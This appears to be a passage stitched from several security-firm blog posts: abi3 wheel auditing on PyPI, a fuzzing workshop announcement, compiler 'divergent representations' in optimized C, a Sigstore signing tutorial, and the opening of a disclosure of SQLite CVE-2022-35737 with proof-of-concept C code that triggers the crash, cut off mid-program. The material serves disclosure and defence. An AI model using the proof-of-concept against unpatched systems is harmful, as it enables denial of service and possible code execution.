  • Of the 357 initial packages queried from PyPI, 339 actually contained auditable wheels. Some were 404s (presumably created and then deleted), while others were tagged with abi3 but did not actually contain any CPython extension modules (which does, technically, make them abi3 compatible!). A handful of these were ctypes-style modules, with either a vendored library or code to load a library that the host was expected to contain.

  • Those 339 remaining packages had a total of 13650 abi3-tagged wheels between them. The largest (in terms of wheels) was eclipse-zenoh-nightly, with 1596 wheels (or nearly 12 percent of all abi3-tagged wheels on PyPI).

  • The 13650 abi3-tagged wheels had a total of 39544 shared objects, each a potential Python extension, between them. In other words: the average abi3-tagged wheel has 2.9 shared objects in it, each of which was audited by abi3audit.

    • Attempting to parse each shared object in each abi3-tagged wheel produced all kinds of curious results: plenty of wheels contained invalid shared objects: ELF files that began with garbage (but contained a valid ELF later in the file), temporary build artifacts that weren’t cleaned up, and a handful of wheels that appeared to contain editor-style swap files for hand-modified binaries. Unfortunately, unlike Moyix, we did not discover any catgirls.

Now, the juicy parts:

Of the 357 valid packages, 54 (15 percent) contained wheels with ABI version violations. In other words: roughly one in six packages had wheels that claimed support for a particular Python version, but actually used the ABI of a newer Python version.

More severely: of those same 357 valid packages, 11 (3.1 percent) contained outright ABI violations. In other words: roughly one in thirty packages had wheels that claimed to be stable ABI compatible, but weren’t at all!

In total, 1139 (roughly 3 percent) Python extensions had version violations, and 90 (roughly 0.2 percent) had outright ABI violations. This suggests two things: that the same packages tend to have ABI violations across multiple wheels and extensions, and that multiple extensions within the same wheel tend to have ABI violations at the same time (which makes sense, since they should share the same build).

Here are some that we found particularly interesting:

PyQt6 and sip

PyQt6 and sip are both part of the Qt project, and both had ABI version violations: multiple wheels were tagged for CPython 3.6 (cp36-abi3), but used APIs that were only stabilized with CPython 3.7.

sip additionally had a handful of wheels with outright ABI violations, all from the internal _Py_DECREF API:

refl1d

refl1d is a NIST-developed reflectometry package. They did a couple of releases tagged for the stable ABI of Python 3.2 (the absolute lowest), while actually targeting the stable ABI of Python 3.11 (the absolute highest — not even released yet!).

hdbcli

hdbcli appears to be a proprietary client for SAP HANA, published by SAP themselves. It’s tagged as abi3, which is cool! Unfortunately, it isn’t actually abi3-compatible:

This, again, suggests building without the correct macros. We’d be able to figure out more with the source code, but this package appears to be completely proprietary.

gdp and pifacecam

These are two smaller packages, but they piqued my interest because both had stable ABI violations that weren’t just the reference-counting helper APIs:

dockerfile

Finally, I liked this one because it turns out to be a Python extension written in Go, not C, C++, or Rust!

The maintainer had the right idea, but didn’t define Py_LIMITED_API to any particular value. So Python’s headers “helpfully” interpreted that as not limited at all:

The path forward

First, the silver lining: most of the extremely popular packages in the list had no ABI violations or version mismatches. The cryptography and bcrypt packages were spared, for example, indicating strong build controls on their side. Other relatively popular packages had version violations, but they were generally minor (for example: expecting a function that was only stabilized with 3.7, but has been present and the same since 3.3).

Overall, however, these results are not great: they indicate (1) that a significant portion of the “abi3” wheels on PyPI aren’t really abi3-compatible at all (or are compatible with a different version than they claim), and (2) that maintainers don’t fully understand the different knobs that control abi3 tagging (and that those knobs do not actually modify the build itself).

More generally, the results point to a need for better controls, better documentation, and better interoperation between Python’s different packaging components. In nearly all cases, the package’s maintainer has attempted to do the right thing, but seemingly wasn’t aware of the additional steps necessary to actually build an abi3-compatible wheel. In addition to improving the package-side tooling here, the auditing is also automatable: we’ve designed abi3audit in part to demonstrate that it would be possible for PyPI to catch these kinds of wheel errors before they become a part of the public index.

We’re streamers now

Over the years, we’ve built many high-impact tools that we use for security reviews. You might know some of them, like Slither, Echidna, Amarna, Tealer, and test-fuzz. All of our tools are open source, and we love seeing the community benefit from them. But mastering our tools takes time and practice, and it’s easier if someone can guide you. To that end, we’ve created several tutorials (see building-secure-contracts) and frequently host training sessions at conferences. Now we’re going one step further: we’re live-streaming workshops on Twitch and YouTube.

During our streams, Trail of Bits engineers will describe each of our tools in depth, giving users an inside look at the underlying technology and how they can use the tools in their own work. We will focus on providing hands-on experience, with real-world exercises, and answer common questions about the tools.

First up: 6-part series on fuzzing smart contracts

In our first six workshops, we’ll share detailed technical presentations on fuzzing smart contracts and guide attendees through writing invariants for them. Engineers will go over fuzzer setup, how to identify invariants—from simple to complex—and how to translate these invariants into code.

The workshops will be held on the following dates:

Building secure contracts: Learn how to fuzz like a pro

  • Wednesday, November 16 (12pm ET): Introduction to fuzzing (Anish Naik)
  • Tuesday, November 22: Fuzzing arithmetics (Anish Naik)
  • Wednesday, November 30: Intro to AMM’s invariants (Justin Jacob)
  • Tuesday, December 6: AMM fuzzing (Justin Jacob)
  • Wednesday, December 14: Intro to advanced DeFi’s invariants (Nat Chin)
  • Wednesday, December 21: Advanced DeFi invariants (Nat Chin)

You’re welcome to get familiar with our smart contract fuzzer, Echidna, before the workshop. However, it’s not a requirement: the first sessions will cover the basics, while subsequent sessions will be more advanced.

Each session will be interactive, with hosts available to answer questions as they come in from the livestream chat.

More workshops on the way

We’re all about fuzzing, but we think our static analysis tools are pretty cool, too. In 2023, our livestream workshops will cover Slither, our static analysis tool for Solidity. We are also planning sessions that cover other tools from our catalog, such as our static analyzer and linter for Circom (Circomspect), our privacy testing library for deep learning systems (PrivacyRaven), and our interactive documentation on zero-knowledge proof systems and related primitives (ZKDocs). Let us know which tools you’d like to learn more about, and we’ll see you on stream!

Look out! Divergent representations are everywhere!

By Andreas Kellas

Trail of Bits recently published a blog post about a signed integer overflow in certain versions of SQLite that can enable arbitrary code execution and result in a denial of service. While working on proof-of-concept exploits for that vulnerability, we noticed that the compiler’s representation of an important integer variable is semantically different in different parts of the program. These differences result in inconsistent interpretations of the variable when it overflows, which we call “divergent representations.” Once we found an example, we tried to find more—and discovered that divergent representations are actually quite common in compiled C code.

This blog post examines divergent representations of the same source code variable produced by compiler optimizations. We’ll attempt to define divergent representations and look at the SQLite vulnerability we discovered, which was made easier to exploit by the divergent representation of a source code variable (one exhibiting undefined behavior). We’ll then describe the binary and source code analyses that we used to find more divergent representations in existing open-source codebases. Finally, we’ll share some suggestions for eliminating the risk that a program will be compiled with divergent representations.

A simple example

Here’s a simple example of a real-life code pattern that can result in divergent representations:

int index_of(char *buf, char target) {
    int i;
    for (i=0; buf[i] != target; i++) {}
    return i;
}

The index_of function receives a character array as input, loops through the array and increments i until it encounters the first target character, and returns the index of that target character. One might expect that buf[index_of(buf, target)] == target, but the evaluation of that statement can depend on the compiler’s optimization level. More specifically, it can depend on the compiler’s handling of undefined behavior when the value of i exceeds the maximum positive int value (INT_MAX, i.e., 0x7fffffff).

If the target character appears in the first INT_MAX bytes of the buffer, the function will exhibit well-defined behavior, assuming that the platform uses 32-bit integers. If the function scans the first INT_MAX bytes of the array without finding the target character, i will be incremented beyond the maximum representable positive value for the int type, which is undefined behavior.

So how would the compiler handle that code—that is, code that could exhibit a signed integer overflow at runtime? Of course, because signed integer overflows are undefined behavior, the compiler could choose to do anything at all, including producing “nasal demons.” This is a question about expectations, then: What would we expect a reasonable compiler to do? If i were incremented beyond INT_MAX, where would we expect index_of to try to read a character from memory?

We might expect the compiler to make one of two seemingly reasonable choices:

1. Represent i as a signed 32-bit value, causing i to wrap from INT_MAX (a positive value represented as 0x7fffffff) to INT_MIN (a negative value represented as 0x80000000), in which case the function would read the next byte from buf[INT_MIN] as a negative array index
2. Represent i as an unsigned 64-bit value, causing i to increment to the unsigned value 0x80000000 and the function to read the next byte from buf[0x80000000ul], which is the next contiguous byte in memory

In either case, if the next character read were the target byte, the index_of function would return (int) 0x80000000, which is INT_MIN (a negative number). However, in case 2, the memory location checked for the target character would not be buf[INT_MIN]. In other words, the expression buf[index_of(buf, target)] == target would not be true if the compiler chose to represent i as an unsigned 64-bit value—and that is exactly how Clang compiles index_of at optimization level -O1 and above:

index_of(char*, char):              # @index_of(char*, char)
        mov     eax, -1
.LBB0_1:                            # =>This Inner Loop Header: Depth=1
        inc     eax
        lea     rcx, [rdi + 1]
        cmp     byte ptr [rdi], sil
        mov     rdi, rcx
        jne     .LBB0_1
        ret

This is an example of a divergent representation of the same source code variable, i. The value of i returned by the function is represented by addition (inc) on the 32-bit eax register, while the value of i used to access the array buffer is represented by addition (lea) on the 64-bit rdi register. The source code makes no distinction between these two versions of i, as the programmer likely expected that the value used to index into the buffer would be the same one returned by the function. As we’ve shown, though, that is not the case.

How do divergent representations appear?

A compiler can apply optimizations to a program to improve the program’s performance. Compilers must ensure the correctness of operations over well-defined inputs, but they can take arbitrary liberties to speed up the execution of undefined behavior. For example, to optimize code on a 64-bit platform, a compiler can replace 32-bit addition with 64-bit addition, because the defined behavior of addition on a 32-bit platform is also defined behavior on a 64-bit platform.

A divergent representation occurs when a compiler applies program optimizations that cause a single source variable to be represented with different semantics in the output program. The instances of divergent representations that we’ve observed all result from undefined behavior (particularly signed integer overflows). Since programmers shouldn’t write programs with undefined behavior, one could argue that divergent representations are a non-issue. However, we assert that programs ought to have consistent interpretations of the same value even in cases of undefined behavior.

The divergent representations that we’ve found occur in code that fits the following pattern:

1. A signed integer variable is declared outside of a loop.
2. The variable is incremented or decremented in the loop and is allowed to overflow.
3. The variable is used in the loop to access an array.
4. The variable is used outside of the loop.

A 2011 discussion on the LLVM developers mailing list provides fascinating insight into the representation of variables that may overflow, along with the effect that an overflow has on optimizations.

A wild divergent representation appears!

We discovered our first divergent representation while we were trying to develop a proof-of-concept exploit for CVE-2022-35737, a vulnerability that we discovered in SQLite. We noticed that our proof-of-concept exploit behaved differently when executed with a debug build of libsqlite3.so (compiled without optimizations) and with the optimized release version of libsqlite3.so; we found that curious, as it seemed to imply that the optimizations had produced semantically different compilations of the same library.

We dug deeper by disassembling the two versions of the library and analyzing the code near the vulnerability. The differences in the compiled code stem from the source code, specifically the sqlite3_str_vappendf function:

806 int i, j, k, n, isnull;
    ...
824 k = precision;
825 for(i=n=0; k!=0 && (ch=escarg[i])!=0; i++, k--){
826   if( ch==q )  n++;
827   if( flag_altform2 && (ch&0xc0)==0xc0 ){
828     while( (escarg[i+1]&0xc0)==0x80 ){ i++; }
829   }
830 }

The figure below shows the disassembled version of the optimized binary:

In that code snippet, a user input buffer (escarg) is scanned for quotation marks and Unicode characters. At instruction [1a], r10 contains the address of escarg, and rsi is used to index into the buffer to fetch a value from it; the rsi register is set in the previous instruction, which sign-extends the 32-bit edx register. This indexing operation corresponds to the escarg[i] expression on line 825 of the source code. With each loop iteration, edx is incremented at instruction [1b]; thus, the source code variable i is represented as a signed 32-bit integer and can be used as a negative index into escarg.

However, instruction [2a] shows something different: r10 still contains the address of escarg, but rax+1 is used to index into the buffer in the inner loop that scans for Unicode characters (in the escarg[i+1] expression on line 828 of the source code). Instruction [2b] increments rax as a 64-bit value—and with no 32-bit sign extension—before looping back to [2a]. This version of i is represented as a 64-bit unsigned integer, so when i exceeds the maximum 32-bit signed integer value (0x7fffffff), its next memory access will be at escarg+0x80000000.

The exploit worked by leveraging the different semantics for i on line 828; these semantics cause i to wrap to a specific small positive value upon an overflow, so it will not be used as a negative index into the escarg buffer on line 825. Details on the exploit are provided in our blog post about the vulnerability and in our proof-of-concept exploits.

Searching for more divergent representations

After finding a divergent representation in a popular codebase, we started wondering, “Is it a one-off? Can we find divergent representations in other projects?” We tried two approaches to identifying other potential divergent representations and found more examples in SQLite and libxml2.

Bottom-up (compiled binary) search

In our first attempt to find more divergent representations, we took a “bottom-up” approach, looking directly at compiled binaries. We wrote a Binary Ninja script that models the compiled patterns of divergent representations and leverages the abstractions provided by Binary Ninja’s Medium Level Intermediate Language (MLIL) Static Single Assignment (SSA) form. We scanned all instructions in each function’s MLIL representation for any Phi nodes that do the following:

1. Use a variable that is defined by the Phi node’s defined variable (indicating that the node may affect a loop-control variable)
2. Define a variable that is used in a downcasting operation (and is thus represented elsewhere as a narrower value)
3. Use a variable that is assigned multiple sizes (i.e., a variable that may be represented as either 64 bits or 32 bits)
4. Define a variable that is used in a subsequent 64-bit operation

If a Phi node matched all of those criteria, we marked it as a potential source of a divergent representation and printed it to the Binary Ninja console for investigation.

Our script found additional potential divergent representations in both SQLite and libxml2, including in the libxml2 nodes below:

The first five Phi nodes identified by the Binary Ninja script in its scan of libxml2.so

The script also identified the following Phi node not pictured above:

xmlBuildURI@0x7b6c0: rax_33#51 = ϕ(rax_33#50, rax_33#52)

The addr2line utility indicates that this portion of the binary corresponds to libxml2/uri.c:2085 in the xmlBuildURI function:

2084 while (bas->path[cur] != 0) {
2085     while ((bas->path[cur] != 0) && (bas->path[cur] != '/'))
2086         cur++;
2087     if (bas->path[cur] == 0)
2088         break;
2089
2090     cur++;
2091     while (out < cur) {
2092         res->path[out] = bas->path[out];
2093         out++;
2094     }
2095 }

This code pattern appears to be similar to that in the original SQLite code. Note, though, that code compiled with divergent representations will not necessarily be reachable, even with undefined inputs. For example, if there is no way to advance the integer cur beyond the acceptable values for a 32-bit integer, the semantics of the integer in the above code snippet will not diverge.

Unsurprisingly, when we ran our script on a version of the libraries compiled without optimizations (level -O0), we did not find any divergent representations. That outcome validated our understanding of divergent representations as caused by compiler optimizations.

    Top-down (source code) search

    We also performed a “top-down” search for source code patterns that could produce divergent representations when compiled with optimizations.

    We used CodeQL to create source code queries. These queries identify source code in which the following conditions hold:

    1. A variable is declared outside of a loop.
    2. The variable is incremented in the loop body.
    3. The variable is used to access memory in a statement in the loop body.
    4. The variable is used again after the loop, outside of the loop body.

    We also ran CodeQL with an additional optional condition, querying for cases in which the variable is used to access memory in a conditional statement in the loop, rather than just in its body. That cut down on the number of false positives by eliminating cases in which a loop condition prevents the variable from overflowing. (For example, if i is used in the loop condition i < 10, it won’t overflow, but if the loop condition is buf[i] != x, i may overflow.)

    CodeQL found 20 code patterns that could produce divergent representations in libxml2, two of which (in xmlBuildURI) were also identified by Binary Ninja.

    Note that our top-down and bottom-up searches identified code in which divergent representations may exist; an actual divergence in the program semantics would still require input that caused undefined behavior.

    Preventing divergent representations in compiled programs

    The best way to prevent a divergent representation is to avoid including undefined behavior in a program. That’s not particularly actionable advice, though. It would be even less helpful for us to suggest that programmers avoid writing for and while loops that use variables declared outside of the loop.

    Instead, programmers should use data types that cannot overflow for variables used to count or access arrays (e.g., size_t or uintptr_t instead of int). They should also avoid a practice that is unfortunately common among C programmers: tying error conditions to int functions’ negative return values (e.g., using a return value of -1 to indicate a failure); assuming a larger-scale refactoring is not possible, we recommend using ssize_t instead of int in those cases. Finally, programmers should avoid making any assumptions whatsoever about what a program will do in response to undefined behavior.
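
    Here is the same hypothetical scan rewritten along those lines:

    #include <stddef.h>
    #include <sys/types.h>

    /* A size_t counter cannot wrap before exhausting the 64-bit address
     * space, so there is no 32-bit overflow for the compiler to exploit. */
    size_t first_space(const char *buf) {
        size_t i = 0;
        while (buf[i] != ' ')
            i++;
        return i;
    }

    /* When a negative "not found" value is unavoidable, prefer ssize_t to
     * int so that indexes larger than INT_MAX remain representable. */
    ssize_t first_space_checked(const char *buf, size_t len) {
        for (size_t i = 0; i < len; i++)
            if (buf[i] == ' ')
                return (ssize_t)i;
        return -1;
    }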

    Conclusion

    We cannot make a blanket statement assessing the risks associated with divergent representations. Some are essentially unreachable and can be seen as curiosities of undefined behavior, a source of C programming trivia questions that will stump your friends. Others may be more consequential, turning otherwise benign integer overflows into exploitable vulnerabilities, as in the case of our SQLite vulnerability. Our hope is that by describing the phenomenon and enabling programmers to identify divergent representations when they appear, we can help the community accurately gauge their severity.

    I’d like to thank my mentor, Peter Goodman, for his expert guidance in the pursuit of vulnerabilities and weird compiler behaviors during my summer internship with Trail of Bits.

    We sign code now

    By William Woodruff

    Sigstore announced the general availability of its free and ecosystem-agnostic software signing service two weeks ago, giving developers a way to sign, verify and protect their software projects and the dependencies they rely on. Trail of Bits is absolutely thrilled to be a part of the project, and we spoke about our work at the inaugural SigstoreCon.

    While the opportunity to speak about Sigstore is amazing, we don’t want to stop there. We think Sigstore is a critical and much-needed step towards accessible software signing, which has become a key component of software supply chain management and security.

    Here are some of the ways Trail of Bits has contributed (and will continue to contribute!) to the overall growth of the Sigstore ecosystem. Strap in!

    What exactly is Sigstore?

    For those unfamiliar: Sigstore is a Linux Foundation project, with contributions from big tech companies and well-regarded academic institutions, focused on a simple mission: to enable code signing and verification for everyone.

    How it goes about doing that is a little more complicated. Sigstore is composed of two core services:

    • Fulcio, a public root certificate authority that issues short-lived signing certificates for authorized identities and commits those certificates to a Certificate Transparency log;
    • Rekor, a transparency and timestamping service for signed artifacts, with strong integrity guarantees.

    Together, Fulcio and Rekor allow programmers to mint short-lived signing certificates, commit to those certificates publicly (making it harder for an attacker to surreptitiously obtain a valid certificate), sign artifacts against those certificates, and then publicly commit to the resulting signatures (again, making it harder for a surreptitious attacker).

    The two services use standard formats and protocols (x509v3 and CT) in order to be interoperable with pre-existing verification schemes and machinery. Because of this, Sigstore is already being slotted into pre-existing workflows: you can use gitsign today to sign git commits using Sigstore, without any modifications to git itself!

    What makes Sigstore special?

    Sigstore is basically a PKI ecosystem, but specialized for short-term signing certificates.

    But what gives Sigstore its special sauce is identity: Fulcio is a root CA, but only for developer or machine identities. More precisely, Fulcio won’t let just any certificate signing request go through: requests must be accompanied by an OpenID Connect (OIDC) token, which attests to an intended identity. That identity is then baked into the signing certificate, allowing anybody to confirm that a given signature was produced by the identity named in the certificate.

    When Fulcio receives an OIDC token (which is really just a JSON Web Token), it verifies it against the service it claims to be from using OIDC’s .well-known lookup protocol (i.e., by fetching the issuer’s /.well-known/openid-configuration document). A handful of services (with known-high-quality IdPs) are currently supported, among them:

    • GitHub: Individual email identities (corresponding to GitHub accounts) can be attested to, as can machine identities for workflow actions.

    • Google and Microsoft: Individual email identities are supported, including for non-service accounts. In other words: as long as you have a Google or Microsoft account you can attest to the email that’s been linked to it, even if that email is not controlled by Google or Microsoft.

    • Kubernetes: Cloud-based Kubernetes instances (e.g. those provided by AWS, Azure, and Google Cloud) can attest to their cluster identities.

    This identity-first approach turns code-signing on its head: rather than manually establishing trust in the identity behind a public key (which is the norm with PGP-based code signing), a verifier takes a public identity that they trust and simply asks the public signing log whether that identity has signed for the artifact they’d like to use. The end result: strong cryptographic primitives by default, no more brittle key management (on either end), no more broken webs of trust, and a publicly-accessible transparency log that keeps all signing parties honest.

    This model additionally enables powerful misuse-resistant techniques, like “keyless” signing: rather than holding onto long-lived signing keys, users can create a short-lived key, request a certificate for it from Fulcio, and discard it once all signing operations are done. The key never leaves memory and is never reused, drastically reducing the threat (and blast radius) of key theft.

    How do I use Sigstore?

    In the abstract, Sigstore’s “identity-first” model can be a little mind-bending. Here’s an example of how it’s used:

    To get started, we’ll install sigstore-python, the official (and Trail of Bits maintained!) Python implementation of Sigstore:

    $ python -m pip install sigstore

    Once we have it installed, we can use it to sign a local file (you can sign anything, including Python packages or distributions for any language!):

    $ python -m sigstore sign README.md
    Waiting for browser interaction...
    Using ephemeral certificate:
    -----BEGIN CERTIFICATE-----
    MIICwTCCAkegAwIBAgIUZr4/MflYaUb/SSw0CgNj+qLZDhMwCgYIKoZIzj0EAwMw
    NzEVMBMGA1UEChMMc2lnc3RvcmUuZGV2MR4wHAYDVQQDExVzaWdzdG9yZS1pbnRl
    cm1lZGlhdGUwHhcNMjIxMDI4MTYzMjQzWhcNMjIxMDI4MTY0MjQzWjAAMHYwEAYH
    KoZIzj0CAQYFK4EEACIDYgAEVBG9SWAO0pkbhrsKtDUN4Il5OK115yp+Ai5GiDYW
    V1obpF1Ih+/NrtTDN+tdkop0T6Z8eotVjpnyrFpc4TbA6okIZ2eo6oFwRD3tn/mG
    4BFPgm4O4Nvgih+f75M845c1o4IBSTCCAUUwDgYDVR0PAQH/BAQDAgeAMBMGA1Ud
    JQQMMAoGCCsGAQUFBwMDMB0GA1UdDgQWBBRE3hH5uBNf4l/EDxedz0aNNAZX+zAf
    BgNVHSMEGDAWgBTf0+nPViQRlvmo2OkoVaLGLhhkPzAjBgNVHREBAf8EGTAXgRV3
    aWxsaWFtQHlvc3Nhcmlhbi5uZXQwLAYKKwYBBAGDvzABAQQeaHR0cHM6Ly9naXRo
    dWIuY29tL2xvZ2luL29hdXRoMIGKBgorBgEEAdZ5AgQCBHwEegB4AHYACGCS8ChS
    /2hF0dFrJ4ScRWcYrBY9wzjSbea8IgY2b3IAAAGEH3BI7gAABAMARzBFAiEAnrGB
    RDQMHW26GT4H/nCvTBQ7RzBI3ix8rRewG6Bii10CIBnjNsSYBhNB77nNmAheoxxj
    XQWJuQ4n2iQu9FB4AGeKMAoGCCqGSM49BAMDA2gAMGUCMQDaV/a8myBO5yKDBTvS
    fM9ziqC1zOiDrXXg+k4lVg02idTHeukbUZTKsROzOsPSRfUCMCsp30CTXrJPBUfN
    dCxmp44zCE7/yGkNCu+5waxPhOI7mXrfQ7FqzmZ0Z5cs9H/CiA==
    -----END CERTIFICATE-----
    
    Transparency log entry created at index: 6052228
    Signature written to file README.md.sig
    Certificate written to file README.md.crt

    This just works™. Behind the scenes, Sigstore is:

      1. Creating a new local ephemeral keypair;

      2. Retrieving the OIDC identity token, either via an interactive OAuth2 flow or ambient credential detection;

      3. Submitting a Certificate Signing Request to Fulcio, combined with the OIDC token and a proof of possession for the private half of the ephemeral keypair;

      4. Receiving the SCT, Certificate, and intermediate chain from Fulcio, and verifying all three;

      5. Actually signing for the input, using the private key;

      6. Publishing the signature, the input’s hash, and the signing certificate to Rekor;

      7. Saving all necessary verification materials locally, for later distribution and verification.

    The end result: for the input README.md, sigstore-python produces a README.md.crt containing the (PEM-encoded) x509 signing certificate, and a README.md.sig containing the (base64-encoded) signature.

    We can then use any ordinary x509 inspection tool (like openssl x509) to inspect the certificate, and confirm that its extensions contain Sigstore-specific entries for the identity we signed with.
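
    For example, with a standard OpenSSL installation:

    $ openssl x509 -in README.md.crt -text -noout

    Abbreviated to just the certificate’s extensions, the output looks like this: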

            X509v3 extensions:
                X509v3 Key Usage: critical
                    Digital Signature
                X509v3 Extended Key Usage:
                    Code Signing
                X509v3 Subject Key Identifier:
                    96:96:0F:0F:FB:19:76:15:15:D8:82:BB:8A:04:07:14:E8:85:EA:DA
                X509v3 Authority Key Identifier:
                    DF:D3:E9:CF:56:24:11:96:F9:A8:D8:E9:28:55:A2:C6:2E:18:64:3F
                X509v3 Subject Alternative Name: critical
                    email:william.woodruff@trailofbits.com
                1.3.6.1.4.1.57264.1.1:
                    https://accounts.google.com
                CT Precertificate SCTs:
                    Signed Certificate Timestamp:
                        Version   : v1 (0x0)
                        Log ID    : 08:60:92:F0:28:52:FF:68:45:D1:D1:6B:27:84:9C:45:
                                    67:18:AC:16:3D:C3:38:D2:6D:E6:BC:22:06:36:6F:72
                        Timestamp : Oct 28 16:44:57.279 2022 GMT
                        Extensions: none
                        Signature : ecdsa-with-SHA256
                                    30:44:02:20:1E:FB:5C:97:4D:BB:EC:A2:51:14:9A:A7:
                                    FC:EB:59:9B:10:AA:37:5F:13:E0:D0:D3:ED:4D:3D:36:
                                    18:E1:53:38:02:20:5C:67:61:F4:2E:15:3D:25:14:79:
                                    7F:94:F7:5F:A2:9D:2F:15:71:B9:15:29:AF:7A:9F:3D:
                                    09:77:3B:C1:5E:68
    

    Of course, that’s just human inspection. To actually verify the file against its signing artifacts, we can use sigstore verify:

    # this automatically discovers README.md.crt and README.md.sig
    $ python -m sigstore verify \
        --cert-email william.woodruff@trailofbits.com \
        --cert-oidc-issuer https://accounts.google.com \
        README.md
    OK: README.md

    Again, this just works™:

      1. We verify that the signing certificate (README.md.crt) was signed by the Sigstore certificate chain, linking it back up to the Fulcio root certificate;

      2. We check that the certificate’s SAN and issuer extension correspond to our expected identity (my email address, attested by Google’s IdP);

      3. We verify that the signature (README.md.sig) was produced from the public key attested by the signing certificate;

      4. We check Rekor for a record matching the current verification materials, and then check the resulting record’s Merkle inclusion proof and Signed Entry Timestamp signature;

      5. Finally, we confirm that the signature was integrated into Rekor at a time when the certificate was valid.

    The last two Rekor steps can be additionally visualized through Chainguard’s excellent Rekor web interface:

    Put together, these checks provide strong proof that someone with control over my email identity (i.e., me) signed for an artifact at a specific time, all without either me or the verifying party ever having to directly manage key material!

    The bright present and future

    Now that Sigstore is generally available, we can accelerate our plans to integrate it into ecosystems that currently lack a strong codesigning model. We’ve already made some progress on that, including:

    • CPython itself is now released with Sigstore signatures, created using our very own sigstore-python. You can verify them today, using the exact same sigstore verify command above!

    • A GitHub Action for signing artifacts and automatically attaching signatures to releases, all using GitHub Actions’ built-in OIDC provider!

    That said, there’s plenty of work that needs to be done:

    • sigstore-python needs plenty of work to reach a 1.0 stable release, including work toward stabilizing an importable Python API.

    • Critical UX work is needed to ensure that users understand what exactly they’re doing when they verify an identity’s signature.

    • As part of the Sigstore project’s overall commitment to availability and resiliency, we’re working on a conformance test suite that every independent client implementation of Sigstore is expected to pass. We’ll be working with each implementation in the coming months, helping them integrate it into their CI systems.

    • Sigstore is already being used successfully in many ecosystems, but we at Trail of Bits are particularly interested in its use on PyPI and eventual end use in package installers like pip. We’re actively working with the Python packaging community to bring Sigstore support to PyPI!

    Overall, we think Sigstore has an incredibly bright future, and we’re excited to be a part of it. If you’re as excited about Sigstore as we are, then we’d love to hear from you!

    Stranger Strings: An exploitable flaw in SQLite

    By Andreas Kellas

    Trail of Bits is publicly disclosing CVE-2022-35737, which affects applications that use the SQLite library API. CVE-2022-35737 was introduced in SQLite version 1.0.12 (released on October 17, 2000) and fixed in release 3.39.2 (released on July 21, 2022). CVE-2022-35737 is exploitable on 64-bit systems, and exploitability depends on how the program is compiled; arbitrary code execution is confirmed when the library is compiled without stack canaries, but unconfirmed when stack canaries are present, and denial-of-service is confirmed in all cases.

    On vulnerable systems, CVE-2022-35737 is exploitable when large string inputs are passed to the SQLite implementations of the printf functions and when the format string contains the %Q, %q, or %w format substitution types. This is enough to cause the program to crash. We also show that if the format string contains the ! special character to enable unicode character scanning, then it is possible to achieve arbitrary code execution in the worst case, or to cause the program to hang and loop (nearly) indefinitely.

    SQLite is used in nearly everything, from naval warships to smartphones to other programming languages. The open-source database engine has a long history of being very secure: many CVEs that are initially pinned to SQLite actually don’t impact it at all. This blog post describes the vulnerability, which actually does impact certain versions of SQLite, and our proof-of-concept exploits. Although this bug may be difficult to reach in deployed applications, it is a prime example of a vulnerability that is made easier to exploit by “divergent representations” that result from applying compiler optimizations to undefined behavior. In an upcoming blog post, we will show how to find instances of the divergent representations bug in binaries and source code.

    Background: Stumbling onto a bug

    A recent blog post presented a vulnerability in PHP that seemed like the perfect candidate for a variant analysis. That bug manifested when a 64-bit unsigned integer string length was implicitly converted into a 32-bit signed integer when passed as an argument to a function. We formulated a variant analysis for this bug class and found a few bugs; while most of them were banal, one in particular stood out: a function used for properly escaping quote characters in the PHP PDO SQLite module. And thus began our strange journey into SQLite string formatting.

    SQLite is the most widely deployed database engine, thanks in part to its very permissive licensing and cross-platform, portable design. It is written in C, and can be compiled into a standalone application or a library that exposes APIs for application programmers to use. It seems to be used everywhere—a perception that was reinforced when we tripped right over this vulnerability while hunting for bugs elsewhere.

     static zend_string* sqlite_handle_quoter(pdo_dbh_t *dbh, const zend_string *unquoted, enum pdo_param_type paramtype)
     {
    		char *quoted = safe_emalloc(2, ZSTR_LEN(unquoted), 3);
    		/* TODO use %Q format? */
    		sqlite3_snprintf(2*ZSTR_LEN(unquoted) + 3, quoted, "'%q'", ZSTR_VAL(unquoted));
    		zend_string *quoted_str = zend_string_init(quoted, strlen(quoted), 0);
    		efree(quoted);
    		return quoted_str;
     }
    

    In the call above, an unsigned long (2*ZSTR_LEN(unquoted) + 3) is passed as the first parameter to sqlite3_snprintf, which expects a signed integer. This felt exciting, and we quickly scripted a simple proof of concept. We expected to be able to exploit this bug to produce a poorly formatted string with mismatched quote characters by passing large strings to the function, and possibly achieve SQL injection in vulnerable applications.
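
    To make the truncation concrete, here is a minimal sketch (the length mirrors the roughly 2GB string used in the proof of concept below):

    #include <stdio.h>

    int main(void) {
        unsigned long len = (0x100000001UL - 3) / 2;  /* 0x7fffffff */
        int n = 2 * len + 3;  /* 0x100000001 converted to int: the result
                                 is implementation-defined, and is 1 on
                                 typical two's-complement targets */
        printf("size passed to sqlite3_snprintf: %d\n", n);
        return 0;
    }
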
    Imagine our surprise when our proof of concept crashed the PHP interpreter:

    There’s a bug in my bug!

    We quickly determined that the crash was occurring in the SQLite shared object, so we naturally took a closer look at the sqlite3_snprintf function.

    SQLite implements custom versions of the printf family of functions and adds the new format specifiers %Q, %q, and %w, which are designed to properly escape quote characters in the input string in order to make safe SQL queries. For example, we wrote the following code snippet to properly use sqlite3_snprintf with the format specifier %q to output a string where all single-quote characters are escaped with another single quote. Additionally, the entire string is wrapped in a leading and trailing single quote, the way the PHP quote function intends:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sqlite3.h>
    
    int main(int argc, char *argv[]) {
    
        char src[] = "hello, \'world\'!";
        char dst[sizeof(src) + 4];  // Add 4 to account for extra quotes.
    
        sqlite3_snprintf(sizeof(dst), dst, "'%q'", src);
    
        printf("src: %s\n", src);
        printf("dst: %s\n", dst);
        return 0;
    }
    

    sqlite3_snprintf properly wraps the original string in single quotes, and escapes any existing single-quotes in the input string.
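
    Running this should print something like the following, with each embedded single quote doubled and the whole string wrapped in quotes:

    src: hello, 'world'!
    dst: 'hello, ''world''!'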

    Next, we changed our program to imitate the behavior of the PHP script by passing the same large 2GB string directly to sqlite3_snprintf:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sqlite3.h>
    
    #define STR_LEN ((0x100000001 - 3) / 2)
    
    int main(int argc, char *argv[]) {
    
        char *src = calloc(1, STR_LEN + 1); // Account for NULL byte.
        memset(src, 'a', STR_LEN);
        char *dst = calloc(1, STR_LEN + 3); // Account for extra quotes and NULL byte.
    
        sqlite3_snprintf(2*STR_LEN + 3, dst, "'%q'", src);
    
        printf("src: %s\n", src);
